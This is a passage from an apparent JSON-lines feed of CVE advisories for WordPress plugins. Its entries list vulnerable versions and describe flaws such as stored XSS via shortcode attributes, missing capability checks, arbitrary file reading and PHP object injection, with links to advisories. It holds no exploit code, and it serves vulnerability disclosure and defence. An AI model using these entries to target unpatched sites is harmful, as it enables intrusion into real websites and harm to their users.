replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/media-manager-for-userpro\\\/8664618\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89afc78b-efd5-445e-884f-2345e08df705?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89afc78b-efd5-445e-884f-2345e08df705?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13582","slug":"simple-pricing-tables-vc-extension","versionImpact":"1.0","description":"The Simple Pricing Tables For WPBakery Page Builder(Formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wdo_simple_pricing_table_free' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-pricing-tables-vc-extension\\\/tags\\\/1.0\\\/plugin.class.php#L403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-pricing-tables-vc-extension\\\/tags\\\/1.0\\\/plugin.class.php#L403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d94cd171-c2a4-4ef0-bc9a-5fdd2b704b5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d94cd171-c2a4-4ef0-bc9a-5fdd2b704b5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1491","slug":"wp-posts-carousel","versionImpact":"1.3.7","description":"The WP Posts Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018auto_play_timeout\u2019 parameter in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248502\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248502\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-posts-carousel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-posts-carousel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f708c72-7ce2-4eb0-869b-cec4613f6f3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f708c72-7ce2-4eb0-869b-cec4613f6f3f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2539","slug":"file-away","versionImpact":"3.9.9.0.1","description":"The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm,  to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_encrypted.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_encrypted.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_stats.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_stats.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3623","slug":"uncanny-automator","versionImpact":"6.4.0.1","description":"The Uncanny Automator plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 6.4.0.1 via deserialization of untrusted input in the automator_api_decode_message() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files.","refs":"[{\"url\":\"https:\\\/\\\/automatorplugin.com\\\/knowledge-base\\\/uncanny-automator-changelog\\\/#6-4-0-2-2025-04-18\",\"name\":\"https:\\\/\\\/automatorplugin.com\\\/knowledge-base\\\/uncanny-automator-changelog\\\/#6-4-0-2-2025-04-18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php#L540\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php#L540\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276577\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276577\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/helpers\\\/class-automator-recipe-helpers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uncanny-automator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/uncanny-automator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bcfd8f-9785-449a-a0ea-16e2583d684a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00bcfd8f-9785-449a-a0ea-16e2583d684a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39376","slug":"car-park-booking-system-for-wordpress","versionImpact":"2.6","description":"Missing Authorization vulnerability in QuanticaLabs Car Park Booking System for WordPress.This issue affects Car Park Booking System for WordPress: from n\/a through 2.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/car-park-booking-system-for-wordpress\\\/vulnerability\\\/wordpress-car-park-booking-system-for-wordpress-plugin-2-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/car-park-booking-system-for-wordpress\\\/vulnerability\\\/wordpress-car-park-booking-system-for-wordpress-plugin-2-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6290","slug":"tournament-bracket-generator","versionImpact":"1.0.0","description":"The Tournament Bracket Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bracket' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tournament-bracket-generator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tournament-bracket-generator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdde01aa-2d38-4085-b11a-ef8633ee928a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdde01aa-2d38-4085-b11a-ef8633ee928a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8071","slug":"mine-cloudvod","versionImpact":"2.1.10","description":"Mine CloudVod plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018audio\u2019 parameter in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mine-cloudvod\\\/tags\\\/2.1.10\\\/build\\\/audioplayer\\\/render.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mine-cloudvod\\\/tags\\\/2.1.10\\\/build\\\/audioplayer\\\/render.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mine-cloudvod\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mine-cloudvod\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3cd194-3fb8-4dd9-905e-051d5de68b66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3cd194-3fb8-4dd9-905e-051d5de68b66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0369","slug":"gotowp","versionImpact":"5.1.1","description":"The GoToWP WordPress plugin through 5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/351f31e0-cd13-4079-8fd1-447f319133c9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/351f31e0-cd13-4079-8fd1-447f319133c9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2084","slug":"essential-blocks","versionImpact":"4.0.6","description":"The Essential Blocks plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on the get function in versions up to, and including, 4.0.6. This makes it possible for subscriber-level attackers to obtain plugin settings. While a nonce check is present, it is only executed when a nonce is provided. Not providing a nonce results in the nonce verification to be skipped. There is no capability check.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.0.6\\\/includes\\\/Admin\\\/Admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be8c668-0f1c-4f83-8a71-49c8bb9b67ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be8c668-0f1c-4f83-8a71-49c8bb9b67ae?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3158","slug":"mail-control","versionImpact":"0.2.8","description":"The Mail Control plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 0.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77537eb8-1c84-4702-aba1-727b0de1c3e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77537eb8-1c84-4702-aba1-727b0de1c3e1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mail-control\\\/trunk\\\/includes\\\/admin.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mail-control\\\/trunk\\\/includes\\\/admin.php#L42\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1476","slug":"coming-soon-maintenance-mode-from-acurax","versionImpact":"2.6","description":"The Under Construction \/ Maintenance Mode from Acurax plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6 via the REST API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages when maintenance mode is active thus bypassing the protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/coming-soon-maintenance-mode-from-acurax\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/coming-soon-maintenance-mode-from-acurax\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1363","slug":"easy-accordion-free","versionImpact":"2.3.4","description":"The Easy Accordion \u2013 Best Accordion FAQ Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'accordion_content_source' attribute in all versions up to, and including, 2.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f2fa28-5bb2-4633-b2bc-27cc6a4e304c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3044803%40easy-accordion-free&new=3044803%40easy-accordion-free&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4212","slug":"themesflat-addons-for-elementor","versionImpact":"2.1.1","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's TF Group Image, TF Nav Menu, TF Posts, TF Woo Product Grid, TF Accordion, and TF Image Box widgets in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc686a35-4ce3-4359-a7d3-e6459e2f5dfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc686a35-4ce3-4359-a7d3-e6459e2f5dfe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-tfgroupimage.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-tfgroupimage.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-clipping-mask.php#L619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-clipping-mask.php#L619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-navmenu.php#L1843\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-navmenu.php#L1843\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-posts.php#L3350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-woo-product-grid.php#L3646\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-woo-product-grid.php#L3646\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-accordion.php#L1158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-accordion.php#L1158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-imagebox.php#L1313\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/widgets\\\/widget-imagebox.php#L1313\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themesflat-addons-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1639","slug":"license-manager-for-woocommerce","versionImpact":"3.0.7","description":"The License Manager for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the showLicenseKey() and showAllLicenseKeys() functions in all versions up to, and including, 3.0.7. This makes it possible for authenticated attackers, with admin dashboard access (contributors by default due to WooCommerce) to view arbitrary decrypted license keys. The functions contain a referrer nonce check. However, these can be retrieved via the dashboard through the \"license\" JS variable.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e444db-72d5-444f-811e-ade0bc097769?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e444db-72d5-444f-811e-ade0bc097769?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/license-manager-for-woocommerce\\\/tags\\\/3.0.5\\\/includes\\\/Controllers\\\/License.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/license-manager-for-woocommerce\\\/tags\\\/3.0.5\\\/includes\\\/Controllers\\\/License.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9267","slug":"opt-in-hound","versionImpact":"1.4.3","description":"The Easy WordPress Subscribe \u2013 Optin Hound plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b91ec428-8444-4304-8901-4bc3ef146e3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b91ec428-8444-4304-8901-4bc3ef146e3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opt-in-hound\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opt-in-hound\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opt-in-hound\\\/trunk\\\/includes\\\/subscribers\\\/views\\\/view-submenu-page-subscribers.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opt-in-hound\\\/trunk\\\/includes\\\/subscribers\\\/views\\\/view-submenu-page-subscribers.php#L17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49231","slug":"wordpress-video","versionImpact":"1.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Peter CyClop WordPress Video allows Stored XSS.This issue affects WordPress Video: from n\/a through 1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-video\\\/wordpress-wordpress-video-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-video\\\/wordpress-wordpress-video-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11279","slug":"schema-app-structured-data-for-schemaorg","versionImpact":"2.2.4","description":"The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-app-structured-data-for-schemaorg\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/schema-app-structured-data-for-schemaorg\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48db673c-f978-45f4-9d7b-eddd81cee62e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48db673c-f978-45f4-9d7b-eddd81cee62e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12116","slug":"unlimited-theme-addons","versionImpact":"1.2.1","description":"The Unlimited Theme Addon For Elementor and WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.1 via the 'uta-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-theme-addons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-theme-addons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbdb6cc-2a00-4d34-9c11-62f3d1b51c73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dbdb6cc-2a00-4d34-9c11-62f3d1b51c73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12451","slug":"html5-chat","versionImpact":"1.04","description":"The HTML5 chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'HTML5CHAT' shortcode in all versions up to, and including, 1.04 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-chat\\\/trunk\\\/index.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-chat\\\/trunk\\\/index.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98de0a50-8464-4ea6-bf55-add9aab2d716?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98de0a50-8464-4ea6-bf55-add9aab2d716?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13581","slug":"simple-charts","versionImpact":"1.0","description":"The Simple Charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'simple_chart' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-charts\\\/tags\\\/1.0\\\/simple-charts.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-charts\\\/tags\\\/1.0\\\/simple-charts.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca2c66-64df-44c7-9c75-330dddf582c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca2c66-64df-44c7-9c75-330dddf582c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1404","slug":"secure-copy-content-protection","versionImpact":"4.4.7","description":"The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_sccp_reports_user_search() function in all versions up to, and including, 4.4.7. This makes it possible for unauthenticated attackers to retrieve a list of registered user emails.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/class-secure-copy-content-protection-admin.php#L943\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/class-secure-copy-content-protection-admin.php#L943\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/js\\\/secure-copy-content-protection-admin.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secure-copy-content-protection\\\/tags\\\/4.4.6\\\/admin\\\/js\\\/secure-copy-content-protection-admin.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246301\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/secure-copy-content-protection\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/secure-copy-content-protection\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/